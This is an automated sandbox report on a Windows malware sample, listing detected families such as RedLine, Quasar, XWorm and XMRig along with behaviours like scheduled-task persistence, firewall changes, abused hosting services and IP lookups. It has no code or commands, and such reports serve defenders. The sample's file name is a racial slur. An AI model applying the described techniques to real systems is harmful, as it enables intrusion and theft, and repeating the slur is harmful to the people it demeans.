Malware Analysis Report

2025-01-23 11:48

Sample ID 241202-bh6twswqbn
Target niggers.exe
SHA256 c26e2475ef60ba969bb66c9b464b498efb1da0bf7360ff7545c1db3b707bdbed
Tags
pyinstaller ammyyadmin asyncrat dcrat flawedammyy lumma metasploit njrat quasar redline sliver stealc vidar xmrig xworm 551488411 af458cf23e4b27326a35871876cc63d9 default newoffice office04 sgvp aspackv2 backdoor credential_access defense_evasion discovery evasion execution exploit infostealer miner persistence privilege_escalation rat spyware stealer themida trojan upx vmprotect
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

c26e2475ef60ba969bb66c9b464b498efb1da0bf7360ff7545c1db3b707bdbed

Threat Level: Known bad

The file niggers.exe was found to be: Known bad.

Malicious Activity Summary

pyinstaller ammyyadmin asyncrat dcrat flawedammyy lumma metasploit njrat quasar redline sliver stealc vidar xmrig xworm 551488411 af458cf23e4b27326a35871876cc63d9 default newoffice office04 sgvp aspackv2 backdoor credential_access defense_evasion discovery evasion execution exploit infostealer miner persistence privilege_escalation rat spyware stealer themida trojan upx vmprotect

AmmyyAdmin payload

SliverRAT

RedLine

Lumma family

Quasar RAT

Metasploit family

Quasar family

RedLine payload

FlawedAmmyy RAT

Stealc

Vidar

Sliver RAT v2

Quasar payload

Flawedammyy family

XMRig Miner payload

Xmrig family

xmrig

Redline family

Detect Vidar Stealer

Detect Xworm Payload

Dcrat family

njRAT/Bladabindi

MetaSploit

Ammyy Admin

Xworm

Xworm family

Sliver family

Stealc family

Vidar family

AsyncRat

Lumma Stealer, LummaC

Ammyyadmin family

Asyncrat family

DcRat

Process spawned unexpected child process

Njrat family

DCRat payload

Async RAT payload

Grants admin privileges

Downloads MZ/PE file

Modifies Windows Firewall

Contacts a large (652) amount of remote hosts

Creates new service(s)

Indicator Removal: Network Share Connection Removal

Blocklisted process makes network request

Uses browser remote debugging

Possible privilege escalation attempt

Sets file to hidden

Stops running service(s)

Command and Scripting Interpreter: PowerShell

.NET Reactor proctector

ASPack v2.12-2.42

Loads dropped DLL

Modifies file permissions

Executes dropped EXE

Themida packer

VMProtect packed file

Network Service Discovery

Looks up external IP address via web service

Power Settings

Network Share Discovery

Obfuscated Files or Information: Command Obfuscation

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Enumerates processes with tasklist

UPX packed file

AutoIT Executable

Launches sc.exe

Access Token Manipulation: Create Process with Token

System Network Configuration Discovery: Internet Connection Discovery

System Location Discovery: System Language Discovery

Unsigned PE

Program crash

Event Triggered Execution: Accessibility Features

Permission Groups Discovery: Local Groups

Command and Scripting Interpreter: JavaScript

Enumerates physical storage devices

Detects Pyinstaller

Browser Information Discovery

Embeds OpenSSL

NSIS installer

Delays execution with timeout.exe

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Scheduled Task/Job: Scheduled Task

Suspicious use of FindShellTrayWindow

GoLang User-Agent

Enumerates system info in registry

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Views/modifies file attributes

Suspicious use of SendNotifyMessage

Kills process with taskkill

Runs ping.exe

Gathers network information

Script User-Agent

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2024-12-02 01:09

Signatures

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-12-02 01:09

Reported

2024-12-02 01:16

Platform

win11-20241007-en

Max time kernel

8s

Max time network

379s

Command Line

"C:\Users\Admin\AppData\Local\Temp\niggers.exe"

Signatures

Ammyy Admin

rat ammyyadmin

AmmyyAdmin payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Ammyyadmin family

ammyyadmin

AsyncRat

rat asyncrat

Asyncrat family

asyncrat

DcRat

rat infostealer dcrat

Dcrat family

dcrat

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

FlawedAmmyy RAT

trojan flawedammyy

Flawedammyy family

flawedammyy

Lumma Stealer, LummaC

stealer lumma

Lumma family

lumma

MetaSploit

trojan backdoor metasploit

Metasploit family

metasploit

Njrat family

njrat

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\schtasks.exe

Quasar RAT

trojan spyware quasar

Quasar family

quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Redline family

redline

Sliver RAT v2

Description Indicator Process Target
N/A N/A N/A N/A

Sliver family

sliver

SliverRAT

trojan backdoor sliver

Stealc

stealer stealc

Stealc family

stealc

Vidar

stealer vidar

Vidar family

vidar

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Xmrig family

xmrig

Xworm

trojan rat xworm

Xworm family

xworm

njRAT/Bladabindi

trojan njrat

xmrig

miner xmrig

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

DCRat payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Grants admin privileges

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Contacts a large (652) amount of remote hosts

discovery

Creates new service(s)

persistence execution

Downloads MZ/PE file

Indicator Removal: Network Share Connection Removal

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\net.exe N/A
N/A N/A C:\Windows\system32\net.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\takeown.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Sets file to hidden

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Stops running service(s)

evasion execution

.NET Reactor proctector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\SysWOW64\takeown.exe N/A
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

VMProtect packed file

vmprotect
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A bitbucket.org N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A bitbucket.org N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A bitbucket.org N/A N/A
N/A bitbucket.org N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A bitbucket.org N/A N/A
N/A bitbucket.org N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A bitbucket.org N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A bitbucket.org N/A N/A
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A

Network Service Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\arp.exe N/A

Network Share Discovery

discovery

Obfuscated Files or Information: Command Obfuscation

defense_evasion

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2876 set thread context of 2144 N/A C:\Users\Admin\Downloads\UrlHausFiles\241.exe C:\Users\Admin\Downloads\UrlHausFiles\241.exe

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Access Token Manipulation: Create Process with Token

defense_evasion privilege_escalation
Description Indicator Process Target
N/A N/A C:\Windows\system32\mshta.exe N/A
N/A N/A C:\Windows\system32\mshta.exe N/A
N/A N/A C:\Windows\system32\mshta.exe N/A
N/A N/A C:\Windows\system32\mshta.exe N/A
N/A N/A C:\Windows\system32\mshta.exe N/A

Browser Information Discovery

discovery

Command and Scripting Interpreter: JavaScript

execution

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Embeds OpenSSL

Description Indicator Process Target
N/A N/A N/A N/A

Enumerates physical storage devices

Event Triggered Execution: Accessibility Features

persistence privilege_escalation

Permission Groups Discovery: Local Groups

discovery

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Downloads\UrlHausFiles\241.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\5474.tmp.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Downloads\UrlHausFiles\NBYS%20AH.NET.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Downloads\UrlHausFiles\GOLD.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Downloads\UrlHausFiles\test.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Downloads\UrlHausFiles\ScreenUpdateSync.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Downloads\UrlHausFiles\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Downloads\UrlHausFiles\r.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Downloads\UrlHausFiles\key.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Downloads\UrlHausFiles\OLDxTEAM.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Downloads\UrlHausFiles\test.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Downloads\UrlHausFiles\msf.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Roaming\Bypass.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Downloads\UrlHausFiles\random.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Downloads\UrlHausFiles\msf.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Downloads\UrlHausFiles\cryyy.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Downloads\UrlHausFiles\vg9qcBa.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\Downloads\UrlHausFiles\vg9qcBa.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\241.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\shell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\241.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\pornhub_downloader.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\SearchUII.exe N/A

NSIS installer

installer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Gathers network information

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A C:\Windows\SysWOW64\ipconfig.exe N/A
N/A N/A C:\Windows\SysWOW64\ipconfig.exe N/A
N/A N/A C:\Windows\SysWOW64\ipconfig.exe N/A

GoLang User-Agent

Description Indicator Process Target
HTTP User-Agent header Go-http-client/1.1 N/A N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Runs net.exe

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
